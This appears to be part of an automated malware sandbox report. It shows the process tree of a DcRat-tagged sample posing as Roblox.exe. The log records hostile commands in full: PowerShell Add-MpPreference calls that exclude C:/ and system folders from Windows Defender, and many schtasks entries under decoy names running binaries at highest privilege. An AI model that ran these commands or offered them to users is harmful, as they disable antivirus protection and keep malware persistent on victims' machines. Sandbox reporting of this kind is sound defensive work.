C:\Windows\SysWOW64\cmd.execmd /c ""C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat" "5⤵
- Loads dropped DLL
PID:2136 -
C:\DriversavessessionDlldhcp\Roblox.exe"C:\DriversavessessionDlldhcp/Roblox.exe"6⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
PID:1856 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ltcsaawt\ltcsaawt.cmdline"7⤵PID:1644
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEDF.tmp" "c:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\CSC37168581A8D94A6C84CFBC64B17B38F4.TMP"8⤵PID:2936
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a2winfxb\a2winfxb.cmdline"7⤵PID:2816
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF4C.tmp" "c:\Users\Admin\Music\CSC6D5C1AFCD1984D5EBFD1EC6CEC5D8814.TMP"8⤵PID:2904
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zo10lvbw\zo10lvbw.cmdline"7⤵
- Drops file in Windows directory
PID:1020 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1056.tmp" "c:\Windows\AppPatch\ja-JP\CSCC375D023683141EC9126F98C4EDA9BAD.TMP"8⤵PID:1908
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3q4jp1de\3q4jp1de.cmdline"7⤵PID:956
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES10B3.tmp" "c:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\CSCA59D324A68AE4B22A6E15266FD9E16AA.TMP"8⤵PID:2108
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q01gslrh\q01gslrh.cmdline"7⤵
- Drops file in Program Files directory
PID:2248 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1130.tmp" "c:\Program Files (x86)\Common Files\DESIGNER\CSCF7CCF5184CCC4DE8B28EE88B3840D7E9.TMP"8⤵PID:912
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hcjwnium\hcjwnium.cmdline"7⤵PID:2880
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES11CC.tmp" "c:\DriversavessessionDlldhcp\CSC559EE64D83AC4A8280A5A24C5B60E145.TMP"8⤵PID:1616
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\flnbjk2l\flnbjk2l.cmdline"7⤵PID:2972
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1297.tmp" "c:\MSOCache\All Users\CSCF356FD83CFB9430EA0EF1F52A39F846.TMP"8⤵PID:1944
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4veo0d4h\4veo0d4h.cmdline"7⤵
- Drops file in Windows directory
PID:1868 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1304.tmp" "c:\Windows\twain_32\CSC9A457BE89CBC4F64AC68B4421A86AF34.TMP"8⤵PID:2720
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l5rfmmif\l5rfmmif.cmdline"7⤵
- Drops file in Program Files directory
PID:1784 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1381.tmp" "c:\Program Files (x86)\Windows Portable Devices\CSC8EB735E73C8240119DE82E7875807925.TMP"8⤵PID:2936
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kqleqlab\kqleqlab.cmdline"7⤵PID:1440
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES13CF.tmp" "c:\Users\All Users\Microsoft\Windows\CSC13970AFFC3FB4AE3A9F39E5D723D41AB.TMP"8⤵PID:2904
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aryds0rx\aryds0rx.cmdline"7⤵PID:2104
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES141D.tmp" "c:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\CSC1DB539DCA86D44AD86BABAAFDEA71AB9.TMP"8⤵PID:2360
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\j10hzyo0\j10hzyo0.cmdline"7⤵
- Drops file in Program Files directory
PID:1232 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES147A.tmp" "c:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\CSC47ECE852170F480E91EA1B84FE8DFF.TMP"8⤵PID:1996
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xq3esore\xq3esore.cmdline"7⤵PID:1532
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES14E8.tmp" "c:\Users\Admin\Music\CSC9B0B8199D9CF45F6B333935465BB2D70.TMP"8⤵PID:2732
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4yeijp43\4yeijp43.cmdline"7⤵
- Drops file in System32 directory
PID:956 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1545.tmp" "c:\Windows\System32\CSC651989FCF30C4F4A86B7699D8127553D.TMP"8⤵PID:2684
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1724
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2780
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriversavessessionDlldhcp/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2596
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1692
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2040
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/winNet/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Roblox.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Roblox.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2592
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\VyvJW8hwqz.bat"7⤵PID:1552
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:2084
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:2988
-
-
C:\Users\Admin\AppData\Local\Roblox.exe"C:\Users\Admin\AppData\Local\Roblox.exe"8⤵
- Executes dropped EXE
PID:2404
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe"C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe"2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2372 -
C:\Windows\system32\CMD.exe"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" & exit3⤵PID:1664
-
C:\Windows\system32\schtasks.exeSchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:1796
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:912
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2600
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST & exit3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1720 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST4⤵
- DcRat
- Suspicious behavior: EnumeratesProcesses
PID:2312
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2596
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:1972
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2704
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:1344
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1804
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:2316
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2036
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:1736
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2704
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:2656
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2244
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:2460
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1000
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:1780
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2880
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1040
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2236
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:964
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1912
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:1228
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:3068
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:1696
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2084
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:2716
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2432
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:956
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2680
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:2972
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2464
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:1568
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2672
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:1644
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1576
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:1624
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2972
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:2536
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1292
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:2556
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:932
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2792
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2764
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:2900
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2592
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:1028
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1912
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:1020
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1440
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:2408
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1288
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:2708
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1664
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:1392
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1532
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:2088
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2860
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:2224
-
-
-
